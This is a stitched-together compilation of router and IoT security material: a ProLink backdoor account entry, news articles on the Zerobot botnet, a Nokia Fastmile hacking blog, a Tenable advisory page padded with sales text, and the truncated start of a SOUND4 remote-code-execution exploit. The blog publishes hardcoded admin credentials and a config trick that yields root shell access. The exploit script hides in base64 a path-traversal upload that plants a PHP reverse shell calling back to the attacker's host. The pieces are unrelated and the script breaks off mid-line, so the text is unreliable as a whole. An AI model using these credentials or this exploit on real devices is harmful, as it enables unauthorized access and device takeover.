The ProLink PRS1841 home router suffers from having a backdoor account.

    # Exploit Title: Router backdoor - ProLink PRS1841 PLDT Home fiber# Exploit Author: Lawrence Amer @zux0x3a# Vendor Homepage: https://prolink2u.com/product/prs1841/# Firmware : PRS1841 U V2# reference: https://0xsp.com/security%20research%20%20development%20srd/backdoor-discovered-in-pldt-home-fiber-routers/Description========================A silent privileged backdoor account discovered on the Prolink PRS1841 routers; allows attackers to gain command execution privileges to the router OS.The vulnerable account issued by the vendor was identified as "adsl" and "realtek" as the default password; attackers could use this account to access the router remotely/internally using either Telnet or FTP protocol.PoC=============================adsl:$1$$m9g7v7tSyWPyjvelclu6D1:0:0::/tmp:/bin/cli

ProLink PRS1841 Backdoor Account

Threat actors continue to evolve the malicious botnet, which has also added a list of new vulnerabilities it can use to target devices.

A recently discovered botnet that attacks organizations through Internet of things (IoT) vulnerabilities has added brute-forcing and distributed denial-of-service (DDoS) attack vectors, as well as the ability to exploit new flaws to its growing arsenal, Microsoft security analysts have found. 

The updates to Zerobot, a malware first observed earlier this month by Fortinet researchers, pave the way for more advanced attacks as the threat continues to evolve, according to the Microsoft Security Threat Intelligence Center (MSTIC).

MSTIC revealed in a blog post on Dec. 21 that the threat actors have updated Zerobot to version 1.1, which can now target resources through DDoS and make them inaccessible, widening the possibilities for attack and further compromise.

"Successful DDoS attacks may be used by threat actors to extort ransom payments, distract from other malicious activities, or disrupt operations," the researchers wrote in the post. "In almost every attack, the destination port is customizable, and threat actors who purchase the malware can modify the attack according to their target."

**Brute-Forcing and Other Tactics**

Fortinet researchers already had tracked two previous versions of Zerobot — one that was quite basic and another that was more advanced. The botnet's principal mode of attack originally was to target various IoT devices — including products from D-Link, Huawei, RealTek, TOTOLink, Zyxel, and more — through flaws found in those devices, and then spread to other assets connected on the network that way to propagate the malware and grow the botnet.

Microsoft researchers now have observed the botnet getting more aggressive in its attacks on devices, using a new brute-force vector to compromise weakly secured IoT devices rather than just trying to leverage a known vulnerability, the researchers revealed.

"IoT devices are often internet-exposed, leaving unpatched and improperly secured devices vulnerable to exploitation by threat actors," they wrote in the post. "Zerobot is capable of propagating through brute-force attacks on vulnerable devices with insecure configurations that use default or weak credentials."

The malware attempts to to gain device access by using a combination of eight common usernames and 130 passwords for IoT devices over SSH and telnet on ports 23 and 2323 to spread to devices, the researchers wrote. In their observations alone, the MSTIC team identified numerous SSH and telnet connection attempts on default ports 22 and 23, as well as attempts to open ports and connect to them by port-knocking on ports 80, 8080, 8888, and 2323.

**An Expanded Security Vulnerability Exploit List**

Zerobot hasn't abandoned its original way to access devices, however, and has even expanded this practice. Prior to its new version, Zerobot already could exploit more than 20 flaws in assorted devices, including routers, webcams, network-attached storage, firewalls, and other products from a host of well-known manufacturers.

The botnet has now added seven new exploits for flaws to its quiver, found in Apache, Roxy-WI, Grandstream, and other platforms, the researchers found.

MSTIC also found new evidence that Zerobot propagates by compromising devices with known vulnerabilities that are not included in the malware binary, such as CVE-2022-30023, a command injection vulnerability in Tenda GPON AC1200 routers, they added.

**Zerobot's Post-Compromise Behavior**

Researchers also observed more about Zerobot's behavior once it gains device access. For one, it immediately injects a malicious payload — which may be a generic script called "zero.sh" that downloads and attempts to execute the bot, or a script that downloads the Zerobot binary of a specific architecture, they said.

"The bash script that attempts to download different Zerobot binaries tries to identify the architecture by brute-force, attempting to download and execute binaries of various architectures until it succeeds," the researchers wrote.

Once Zerobot achieves persistence, it scans for other devices exposed to the Internet that it can infect, by randomly generating a number between 0 and 255 and scanning all IPs starting with this value.

"Using a function called _new\_botnet\_selfRepo\_isHoneypot_, the malware tries to identify honeypot IP addresses, which are used by network decoys to attract cyberattacks and collect information on threats and attempts to access resources," the Microsoft researchers wrote. "This function includes 61 IP subnets, preventing scanning of these IPs."

Zerobot 1.1 uses scripts targeting various architectures, including ARM64, MIPS, and x86\_64. The researchers also have observed samples of the botnet on Windows and Linux devices, exhibiting different persistence methods based on the OS.

**Protecting the Enterprise**

Fortinet researchers already had stressed the importance of organizations immediately updating to the latest versions of any devices affected by Zerobot. Given that businesses are losing up to $250 million a year on unwanted botnet attacks, according to a report published last year from Netacea, the danger is real.

To help identify if an organization is vulnerable, Microsoft researchers included an updated list of CVEs that Zerobot can exploit in their post. The MSTIC team also recommended that organizations use security solutions with cross-domain visibility and detection capabilities to detect Zerobot malware variants and malicious behavior related to the threat.

Enterprises should also adopt a comprehensive IoT security solution that allows for visibility and monitoring of all IoT and operational technology (OT) devices, threat detection and response, and integration with SIEM/SOAR and extended detection and response (XDR) platforms, according to Microsoft.

As part of this strategy, they should ensure secure configurations for devices by changing default passwords to strong ones and blocking SSH from external access, as well as use least-privileges access including VPN service for remote access, the researchers said.

Another way to avoid compromise by Zerobot is to harden endpoints with a comprehensive security solution that manages the apps that employees can use and provides application control for unmanaged solutions, they said. This solution also should perform timely cleanup of unused and stale executables sitting on an organization's devices.

Zerobot Adds Brute Force, DDoS to Its IoT Attack Arsenal

The Zerobot DDoS botnet has received substantial updates that expand on its ability to target more internet-connected devices and scale its network.
Microsoft Threat Intelligence Center (MSTIC) is tracking the ongoing threat under the moniker DEV-1061, its designation for unknown, emerging, or developing activity clusters.
Zerobot, first documented by Fortinet FortiGuard Labs earlier this month,

Internet of Things / Patch Management

The **Zerobot** DDoS botnet has received substantial updates that expand on its ability to target more internet-connected devices and scale its network.

Microsoft Threat Intelligence Center (MSTIC) is tracking the ongoing threat under the moniker DEV-1061, its designation for unknown, emerging, or developing activity clusters.

Zerobot, first documented by Fortinet FortiGuard Labs earlier this month, is a Go-based malware that propagates through vulnerabilities in web applications and IoT devices like firewalls, routers, and cameras.

"The most recent distribution of Zerobot includes additional capabilities, such as exploiting vulnerabilities in Apache and Apache Spark (CVE-2021-42013 and CVE-2022-33891 respectively), and new DDoS attack capabilities," Microsoft researchers said.

Also called ZeroStresser by its operators, the malware is offered as a DDoS-for-hire service to other criminal actors, with the botnet advertised on social media by its operators.

Microsoft said that one domain with connections to Zerobot – zerostresser\[.\]com – was among the 48 domains that were seized by the U.S. Federal Bureau of Investigation (FBI) this month for offering DDoS attack features to paying customers.

The latest version of Zerobot spotted by Microsoft not only targets unpatched and improperly secured devices, but also attempts to brute-force over SSH and Telnet on ports 23 and 2323 for spreading to other hosts.

The list of newly added known flaws exploited by Zerobot 1.1 is as follows -

*   **CVE-2017-17105** (CVSS score: 9.8) - A command injection vulnerability in Zivif PR115-204-P-RS
*   **CVE-2019-10655** (CVSS score: 9.8) - An unauthenticated remote code execution vulnerability in Grandstream GAC2500, GXP2200, GVC3202, GXV3275, and GXV3240
*   **CVE-2020-25223** (CVSS score: 9.8) - A remote code execution vulnerability in the WebAdmin of Sophos SG UTM
*   **CVE-2021-42013** (CVSS score: 9.8) - A remote code execution vulnerability in Apache HTTP Server
*   **CVE-2022-31137** (CVSS score: 9.8) - A remote code execution vulnerability in Roxy-WI
*   **CVE-2022-33891** (CVSS score: 8.8) - An unauthenticated command injection vulnerability in Apache Spark
*   **ZSL-2022-5717** (CVSS score: N/A) - A remote root command injection vulnerability in MiniDVBLinux

Upon successful infection, the attacks chain proceeds to download a binary named "zero" for a specific CPU architecture that enables it to self-propagate to more susceptible systems exposed online.

Additionally, Zerobot is said to proliferate by scanning and compromising devices with known vulnerabilities that are not included in the malware executable, such as CVE-2022-30023, a command injection vulnerability in Tenda GPON AC1200 routers.

Zerobot 1.1 further incorporates seven new DDoS attack methods by making use of protocols such as UDP, ICMP, and TCP, indicating "continuous evolution and rapid addition of new capabilities."

"The shift toward malware as a service in the cyber economy has industrialized attacks and has made it easier for attackers to purchase and use malware, establish and maintain access to compromised networks, and utilize ready-made tools to perform their attacks," the tech giant said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Zerobot Botnet Emerges as a Growing Threat with New Exploits and Capabilities

Nokia Fastmile 3tg00118abad52 devices shipped by Optus are shipped with a default hardcoded admin account of admin:Nq+L5st7o This account can be used locally to access the web admin interface.

Having had some time to off to mull over what to do next and attend to some other priorities I decided it was time to get back to looking at this.  

But first, I had to address the issue of having to take my internet down every time I wanted to do any prodding. So then there were two...

**Fun Party Tricks**

Of course we can't just dive straight into the hard stuff so I thought I'd take a look at what ridiculous things I could do with the Android side first.

As it's just a standard Android phone, we can use scrcpy to virtually interact with it over ADB. This doesn't really tell you anything else that you can't find via CLI.

What it does allow us to do however is install our own apps and interact with them. So naturally, I installed FlappyBird to have a go.

4 WHOLE POINTS

**I am claiming the world record for FlappyBird on a Nokia Fastmile Router.**

**Come at me.**

**Identical Super Admin Passwords**

Alright back to the serious stuff.

After receiving my second device, I noticed that the second device was on a newer firmware version with the authenticated privilege escalation vulnerability patched out.

This locks us out of the configuration backup/restore utility.

Luckily, there's a higher privileged account with the same default password that seems to be baked into every Optus shipped device.

    <WebAccount. n="WebAccount" t="staticObject">
        <Enable rw="RW" t="boolean" v="True"></Enable>
        <Alias t="string" ml="64" rw="RW" dv="cpe-NokiaAlias2" v="cpe-NokiaAlias2"></Alias>
        <Priority max="10" min="1" rw="RW" t="unsignedInt" v="1"></Priority>
        <UserName ml="64" rw="RW" t="string" v="admin"></UserName>
        <Password ml="64" rw="RW" t="string" v="7hrGZUG0NX48jHEq3+Twog==" ealgo="ab"></Password>
        <PresetPassword ml="64" rw="RW" t="string" v="7hrGZUG0NX48jHEq3+Twog==" ealgo="ab"></PresetPassword>
    </WebAccount.>

Using the same tricks from last time the password 'decrypts' to **Nq+L5st7o** with the username being admin.

At least in my case, the password I obtained from my first device also worked on my second device.

Maybe somebody should tell Optus, or maybe not because having full access to these devices is nice.

UDPATE: Informed Nokia and as of U-Boot Aug-09-2022--20:45:33 patch version 3TG00118ABGA31 this is no longer available.

UPDATE 2: This has been assigned CVE-2022-36222.

**Diving into the Firmware**

Shout out to **@neggles** for helping me through some of this.

I never did end up going through the process of dumping the Router side firmware so I might come back to do this as an exercise. In this case, I didn't end up needing to.

**Obtaining Firmware**

When the device goes to update itself, it very nicely logs the download URL for the firmware.

Sifting through my own device's logs I managed to download some firmware only to find that it's encrypted.

Luckily for us some nice person on the internet has posted a download URL for an older firmware version that isn't encrypted.

> https://whrl.pl/RgaV4d

You'll probably need to be on the Optus network somewhere to reach this:  
http://macs.optusnet.com.au/firmware/Nokia/5GGW\_D010003B37T0101E0052\_ota.tar.gz

Cracking open this older firmware file we see a couple of files. The highlighted one being relevant for the Router side with the zip file being relevant for the Android side.

Trying to unpack this file we immediately run into a hurdle, it looks like a UBI image but fails to unpack with ubidump.

Some Googling brings us to this issue which seems to be what we ran into. Several Squashfs volumes inside a UBI image.

Unpacking the squashfs volume shows us the root filesystem.

**Needle in a Haystack**

Cracking open the firmware revealed a massive attack surface to evaluate. I put together a non exhaustive list of things to look at that might help us to get root and just started working my way down the list.

*   Finding an issue with one of the CGI Scripts in the web directory
*   Reversing the jail shell /usr/sbin/vtysh
*   Reversing the configuration management utility usr/sbin/cfgmgr
*   Figure out how to repack the firmware with an entry point for us
*   Attacking the router from the Android side (that 5GCPE app on the Android side must be doing something)
    *   Storage of Android /sdcard/ is shared to the router via USB-OTG and files seem to be written there to transfer some information!
    *   There's also network connectivity as we established last time but I'm unsure if this only used for routing traffic

**CGI Scripts**

Looking at just the first point in that list, there's a sea of CGI scripts that could potentially lead us to shell access.

I had a look at a few of these and found some other vulnerabilities (that will be documented at the bottom for those interested) but quickly decided to move on from this.

**Jail Shell**

> Quick recap, in the last blog post we were able to SSH into the device by enabling the SSH user in the configuration file.
> 
> While the credentials we set in the configuration worked for SSH, they did not work for the password prompt presented when trying to use the 'shell' command at the jail shell.

Next I decided to look at the jail shell which seemed to be located at /usr/sbin/vtysh. Notably, I was interested in what was actually being checked when we were getting prompted for a password.

Opening the binary in Ghidra it become quickly apparent that the password we were getting prompted for had little to do with the one we set in the configuration. It seemed to be consisted of a group of integers that I couldn't figure out where they were set.

Ghidra Output

Reversing isn't my strong suit so I decided to move on from this as well.

**Configuration Manager**

Next I started to look into the configuration manager.

While I was looking at the CGI scripts I noticed a number of them simply took user input and passed them onto bash scripts to then perform actions.

I'm all about being as lazy as possible, so trying the easiest stuff first made sense to see if the same pattern had been used in this binary. After running strings on the binary and sifting through the results, a single line caught my eye.

Adding management users sounds like something I want to do.

In the middle of this script there's also a very interesting if statement (full script for those interested).

    if [ -e /usr/sbin/vtysh -a "$user_name" != "ONTUSER" -a "$OPID" != "0000" -a "OPID" != "9999" ]; then
       adduser -D -h ${home_dir}/${user_name} -G wheel ${user_name} -s /usr/sbin/vtysh
    else
       adduser -D -h ${home_dir}/${user_name} -G wheel ${user_name}
    fi

At this point, we know:

*   We have access to change the config of the router including managing users
*   This script is called by the Configuration Manager at some point
*   If the username == ONTUSER OR if the OperatorID == (9999 OR 1111) then users are created with the **default shell** instead of the **jail shell**
*   In the previous write-up, we found mentions of setting LimitAccount\_ONTUSER in config to false doing something

It can't possibly be that easy.

Bingo

The config ships with the "TelnetSshAccount" username of "admin". I changed this to "ONTUSER" and upon SSH we are greeted with full root access instead of a jail shell.

Config Sample

Mission accomplished.

There's tons more to look at obviously so maybe there'll be a part 3 as I'm almost certain there's another way in with such a large attack surface. For now though, I'll leave you with some of the other interesting things I noticed while looking through this device.

**Other Interesting Things****WTF Backdoor??????**

There's a telnet script in the web directory which seems to spin up a telnet server that gives shell access without authentication.

Couldn't find anywhere this gets called though. ./telnet.sh on will turn the backdoor on and ./telnet.sh st checks the status of the backdoor

**Pipe Path Traversal**

UPDATE: This has been assigned CVE-2022-36221.

The CGI script used to read the output of diagnostic pings is affected by a path traversal vulnerability.

Opening the command\_web\_app.cgi script up we see that it passes user input straight to the cat.sh script.

Ghidra Output of command\_web\_app.cgi

This script performs a check to see if the file is a pipe but otherwise just returns the contents.

The result? We have path traversal!

The usefulness of this is dependent on the existence of pipes on the router that contain sensitive information. Also the endpoint is only available as an authenticated user (albeit full admin is not required).

There's also a similar issue allowing you to check for the existence of any arbitrary directory.

CVE-2022-36222: Hacking the Nokia Fastmile: Part 2

Nokia Fastmile 3tg00118abad52 is affected by an authenticated path traversal vulnerability which allows attackers to read any named pipe file on the system.

CVE-2022-36221: Hacking the Nokia Fastmile: Part 2

The default console presented to users over telnet (when enabled) is restricted to a subset of commands. Commands issued at this console, however, appear to be fed directly into a system call or other similar function. This allows any authenticated user to execute arbitrary commands on the device.

_All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability._

_Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order._

_For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page._

_If you have questions or corrections about this advisory, please email \[email protected\]_

Tenable Advisory ID

TRA-2022-37

Affected Products

NETGEAR Nighthawk WiFi6 Router prior to V1.0.9.90

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable.io Vulnerability Management trial also includes Tenable Lumin, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

 BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Nessus Professional Free**

FREE FOR 7 DAYS

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

**Buy Nessus Professional**

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable.io Vulnerability Management trial also includes Tenable Lumin, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

Tenable.io

BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Tenable.io Web Application Scanning**

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable.io platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. **Sign up now.**

Your Tenable Web Application Scanning trial also includes Tenable.io Vulnerability Management, Tenable Lumin and Tenable.cs Cloud Security.

**Buy Tenable.io Web Application Scanning**

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

**Try Tenable.io Container Security**

Enjoy full access to the only container security offering integrated into a vulnerability management platform. Monitor container images for vulnerabilities, malware and policy violations. Integrate with continuous integration and continuous deployment (CI/CD) systems to support DevOps practices, strengthen security and support enterprise policy compliance.

**Buy Tenable.io Container Security**

Tenable.io Container Security seamlessly and securely enables DevOps processes by providing visibility into the security of container images – including vulnerabilities, malware and policy violations – through integration with the build process.

**Thank You**

Thank you for your interest in the Tenable.io Container Security program. A representative will be in touch soon.

**Try Tenable Lumin**

Visualize and explore your Cyber Exposure, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable.io Vulnerability Management, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

**Buy Tenable Lumin**

Contact a Sales Representative to see how Lumin can help you gain insight across your entire organization and manage cyber risk.

**Thank You**

Thank you for your interest in Tenable Lumin. A representative will be in touch soon.

**Request a demo of Tenable.sc**

Please fill out this form with your contact information.

A sales representative will contact you shortly to schedule a demo.

_\* Field is required_

**Request a demo of Tenable.ot**

Get the Operational Technology Security You Need.

Reduce the Risk You Don’t.

**Request a demo of Tenable.ad**

Continuously detect and respond to Active Directory attacks. No agents. No privileges.

On-prem and in the cloud.

**Try Tenable.cs**

Enjoy full access to detect and fix cloud infrastructure misconfigurations and view runtime vulnerabilities. Sign up for your free trial now.

Your Tenable.cs Cloud Security trial also includes Tenable.io Vulnerability Management, Tenable Lumin and Tenable.io Web Application Scanning.

**Contact a Sales Rep to Buy Tenable.cs**

Contact a Sales Representative to learn more about Tenable.cs Cloud Security and see how easy it is to onboard your cloud accounts and get visibility into both cloud misconfigurations and vulnerabilities within minutes.

**Thank You**

Thank you for your interest in Tenable.cs. A representative will be in touch soon.

**See  
Tenable One  
In Action**

Exposure management for the modern attack surface.

**See Tenable.asm In Action**

Know the exposure of every asset on any platform.

**Thank You**

Thank you for your interest in Tenable.asm. A representative will be in touch soon.

**Try Nessus Expert Free**

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Already have Nessus Professional?**  
Upgrade to Nessus Expert free for 7 days.

**Buy Nessus Expert**

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

CVE-2022-47210: NETGEAR Nighthawk WiFi6 Router Multiple Vulnerabilities

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from an unauthenticated remote code execution vulnerability in upload.cgi.

    #!/usr/bin/env python### SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (upload.cgi) Unauthenticated Remote Code Execution### Vendor: SOUND4 Ltd.# Product web page: https://www.sound4.com | https://www.sound4.biz# Affected version: FM/HD Radio Processing:#                   Impact/Pulse/First (Version 2: 1.1/2.15)#                   Impact/Pulse/First (Version 1: 2.1/1.69)#                   Impact/Pulse Eco 1.16#                   Voice Processing:#                   BigVoice4 1.2#                   BigVoice2 1.30#                   Web-Audio Streaming:#                   Stream 1.1/2.4.29#                   Watermarking:#                   WM2 (Kantar Media) 1.11## Summary: The SOUND4 IMPACT introduces an innovative process - mono and# stereo parts of the signal are processed separately to obtain perfect# consistency in terms of both sound and level. Therefore, in moving# reception, when the FM receiver switches from stereo to mono and back to# stereo, the sound variations and changes in level are reduced by over 90%.# In the SOUND4 IMPACT processing chain, the stereo expander can be used# substantially without any limitations.## With its advanced functionalities and impressive versatility, SOUND4# PULSE gives clients the ultimate price - performance ratio, providing# much more than just a processor. Flexible and powerful, it ensures perfect# sound quality and full compatibility with radio broadcasting standards# and can be used simultaneously for FM and HD, DAB, DRM or streaming.## SOUND4 FIRST provides all the most important functionalities you need# in an FM/HD processor and sets the bar high both in terms of performance# and affordability. Designed to deliver a sound of uncompromising quality,# this tool gives you 2-band processing, a digital stereo generator and an# IMPACT Clipper.## Desc: SOUND4 products suffer from an unauthenticated remote code execution# vulnerability. An attacker can exploit this vulnerability by abusing the# firmware upgrade/upload functionality, which contains a path traversal flaw.# This allows the attacker to arbitrarily write a malicious file to a location# on the system with www-data permissions, which can be executed to gain unauthorized# access.# ---------------------------------------------------------------------------# Starting handler on port 6161.# Writing callback file...# Connection from 192.168.1.137:58670# You got shell.# id# uid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)# exit# *** Connection closed by remote host ***# ---------------------------------------------------------------------------## Tested on: Apache/2.4.25 (Unix)#            OpenSSL/1.0.2k#            PHP/7.1.1#            GNU/Linux 5.10.43 (armv7l)#            GNU/Linux 4.9.228 (armv7l)### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# Macedonian Information Security Research and Development Laboratory# Zero Science Lab - https://www.zeroscience.mk - @zeroscience### Advisory ID: ZSL-2022-5741# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5741.php### 26.09.2022##import ipaddress as irukandji#--        -----------------------------from time import sleep#----------        ----------------------------import threading#-----------------        ---------------------------import telnetlib#------------------        --------------------------import requests#--------------------        -------------------------import socket#-----------------------        ------------------------import base64#------------------------        -----------------------import time#---------------------------        ----------------------import sys#-----------------------------        ---------------------import re#-------------------------------        --------------------importer  = "Y2xhc3MgVmlkZW9LaWxsZWRUaGV"+        "SYWRpb1N0YXI6DQog"importer += "ICAgDQogICAgZGVmIF9faW5pdF9f"+        "KHNlbGYpOg0KICAg"importer += "ICAgICBzZWxmLnNlY3JldGFnZW50I"+        "D0gIkRqL09sZSIN"importer += "CiAgICAgICAgc2VsZi5wYXlsb2FkID"+        "0gTm9uZQ0KICAg"importer += "ICAgICBzZWxmLmRlcGxveSA9IE5vbmU"+        "NCiAgICAgICAg"importer += "c2VsZi5yaG9zdCA9IE5vbmUNCiAgICA"+        "gICAgc2VsZi5s"importer += "aG9zdCA9IE5vbmUNCiAgICAgICAgc2"+        "VsZi5scG9ydCA9"importer += "IE5vbmUNCg0KICAgIGRlZiB0aGVfY"+        "XJncyhzZWxmKToN"importer += "CiAgICAgICAgaWYgbGVuKHN5cy5h"+        "cmd2KSAhPSA0Og0K"importer += "ICAgICAgICAgICAgc2VsZi50aGV"+        "fdXNhZ2UoKQ0KICAg"importer += "ICAgICBlbHNlOg0KICAgICAgIC"+        "AgICAgc2VsZi5yaG9z"importer += "dCA9IHN5cy5hcmd2WzFdDQogI"+        "CAgICAgICAgICBzZWxm"importer += "Lmxob3N0ID0gc3lzLmFyZ3Zb"+        "Ml0NCiAgICAgICAgICAg"importer += "IHNlbGYubHBvcnQgPSBpbnQ"+        "oc3lzLmFyZ3ZbM10pDQog"importer += "ICAgICAgICAgICBpZiBub3"+        "QgImh0dHAiIGluIHNlbGYu"importer += "cmhvc3Q6DQogICAgICAgI"+        "CAgICAgICAgc2VsZi5yaG9z"importer += "dCA9ICJodHRwOi8ve30i"+        "LmZvcm1hdChzZWxmLnJob3N0"importer += "KQ0KDQogICAgZGVmIHR"+        "oZV91c2FnZShzZWxmKToNCiAg"importer += "ICAgICAgc2VsZi50aG"+        "Vfd2hhKCkNCiAgICAgICAgcHJp"importer += "bnQoIlVzYWdlOiBwe"+        "XRob24ge30gW3RhcmdldElQOnRh"importer += "cmdldFBPUlRdIFts"+        "aXN0ZW5JUF0gW2xpc3RlblBPUlRd"importer += "Ii5mb3JtYXQoc3l"+        "zLmFyZ3ZbMF0pKQ0KICAgICAgICBl"importer += "eGl0KDApDQoNCi"+        "AgICBkZWYgdGhlX3doYShzZWxmKToN"importer += "CiAgICAgICAgd"+        "Gl0bCA9ICIiIg0KICAgICAgICAgL1xf"importer += "X19fX18gIF9f"+        "DQogICAgICAgIC8tfiAgICAgLF5+IC8g"importer += "X19uDQogICA"+        "gICAgLyAsLS0teCAvXy4tIkwvX18sXFwN"importer += "CiAgICAgIC"+        "8tIi4tLS0uXF8uLScvISIgIFwgXFwNCiAg"importer += "ICAgIDBcL"+        "zBfX18vICAgeCcgLyAgICApIHwNCiAgICAg"importer += "IFwuX19f"+        "X19fLi0nXy57X18uLSJfLl4NCiAgICAgICBg"importer += "eF9fX18"+        "sLi0iLC1+KCAuLSINCiAgICAgICAgICBfLi18"importer += "ICxeLi"+        "1+ICJcXA0KICAgICBfXy4tfl8sLXwvXC8gICAg"importer += "IGBpD"+        "QogICAgLyB1Li1+IC4te1wvICAgICAuLV4tLS4N"importer += "CiAg"+        "ICBcLyAgIHZ+ICwtXnguX19fX30tLXIgfA0KICAg"importer += "ICAg"+        "ICAvIC8iICAgICAgICAgICAgfCB8DQogICAgICBf"importer += "L18vI"+        "CAgICAgICAgICAgICAhX2xfDQogICAgb35fLy8p"importer += "ICAgIC"+        "AgICAgICAgIChfXFxffm8NCn5+fn5+fn5+fn5+"importer += "fn5+fn5"+        "+fn5+fn5+fn5+fn5+fn5+fn4NCiAgICAgICAg"importer += "IiIiDQog"+        "ICAgICAgIHByaW50KHRpdGwpDQoNCiAgICBk"importer += "ZWYgdGhl"+        "X3VwbG9hZChzZWxmKToNCiAgICAgICAgcHJp"importer += "bnQoIldy"+        "aXRpbmcgY2FsbGJhY2sgZmlsZS4uLiIpDQog"importer += "ICAgICAg"+        "IHNlbGYuaGVhZGVycyA9IHsiQ29udGVudC1U"importer += "eXBlIiA6"+         "ICJtdWx0aXBhcnQvZm9ybS1kYXRhOyBib3V"importer += "uZGFyeT0"+          "tLS0tVGhlTWVudSIsDQogICAgICAgICAgI"importer += "CAgICAgI"+            "CAgICAgICAiQWNjZXB0LUxhbmd1YWdlI"importer += "iA6ICJlb"+              "i1VUyxlbjtxPTAuOSIsDQogICAgICA"importer += "gICAgICA"+                "gICAgICAgICAgICAiQWNjZXB0LUV"importer += "uY29kaW5"+                  "nIiA6ICJnemlwLCBkZWZsYXRlI"importer += "iwNCiAgI"+                    "CAgICAgICAgICAgICAgICAgI"importer += "CAgICJVc"+                      "2VyLUFnZW50IiA6IHNlbGY"importer += "uc2VjcmV"+                        "0YWdlbnQsDQogICAgICA"importer += "gICAgICAg"+                       "ICAgICAgICAgICAiQ2Fj"importer += "aGUtQ29udH"+                      "JvbCIgOiAibWF4LWFnZT"importer += "0wIiwgDQogI"+                     "CAgICAgICAgICAgICAgI"importer += "CAgICAgICAiQ2"+                   "9ubmVjdGlvbiIgOiAiY2"importer += "xvc2UiLA0KICAgI"+                 "CAgICAgICAgICAgICAgI"importer += "CAgICAgIkFjY2VwdC"+               "IgOiAiKi8qIn0NCiAgIC"importer += "ANCiAgICAgICAgc2VsZ"+             "i5wYXlsb2FkID0gIjw/c"importer += "GhwIGV4ZWMoXCIvYmluL2"+          "Jhc2ggLWMgJ2Jhc2ggLWk"importer += "gPiAvZGV2L3RjcC8iK3Nlb"+        "GYubGhvc3QrIi8iK3N0cih"importer += "zZWxmLmxwb3J0KSsiIDwmM"+        "TtybSBiLnBocCdcIik7Ig0"importer += "KDQogICAgICAgIHNlbGYuZ"+        "GVwbG95ICA9ICItLS0tLS1"importer += "UaGVNZW51XHJcbkNvbnRlbn"+        "QtRGlzcG9zaXRpb246IGZ"importer += "vcm0tZGF0YTsiI3VzDQogICA"+        "gICAgIHNlbGYuZGVwbG9"importer += "5ICs9ICIgbmFtZT1cInVwZ2Zp"+        "bGVcIjsgZmlsZW5hbWU"importer += "9XCIuLi8uLi8uLi8uLi8uLi8uL"+        "i8iI01lDQogICAgICA"importer += "gIHNlbGYuZGVwbG95ICs9ICIuLi"+        "92YXIvd3d3L2IucGh"importer += "wXCJcclxuQ29udGVudC1UeXBlOiB"+        "hcHBsaWNhdGlvbi8"importer += "iI2NvDQogICAgICAgIHNlbGYuZGVw"+        "bG95ICs9ICJvY3R"importer += "ldC1zdHJlYW1cclxuXHJcbiIrc2VsZ"+        "i5wYXlsb2FkKyJ"importer += "cclxuLS0tLS0tVGgiIy4uDQogICAgIC"+        "AgIHNlbGYuZGV"importer += "wbG95ICs9ICJlTWVudVxyXG5Db250ZW5"+        "0LURpc3Bvc2l"importer += "0aW9uOiBmb3JtLWRhdGE7IG5hbWU9XCIi"+        "I24NCiAgICA"importer += "gICAgc2VsZi5kZXBsb3kgKz0gInN1Ym1pd"+        "FwiXHJcblx"importer += "yXG5EbyBpdFxyXG4tLS0tLS1UaGVNZW51LS"+        "1cclxuIiM"importer += "tLS0tLS0NCiAgICANCiAgICAgICAgcmVxdWV"+        "zdHMucG9"importer += "zdChzZWxmLnJob3N0KyIvY2dpLWJpbi91cGxv"+        "YWQuY2d"importer += "pIiwgaGVhZGVycz1zZWxmLmhlYWRlcnMsIGRhd"+        "GE9c2V"importer += "sZi5kZXBsb3kpDQogICAgICAgIHNsZWVwKDEpIC"+        "ANCiA"importer += "gICAgICAgcmVxdWVzdHMuZ2V0KHNlbGYucmhvc3Q"+        "rIi9"importer += "iLnBocCIpDQoNCiAgICBkZWYgdGhlX3N1YnAoc2Vs"+        "Zik"importer += 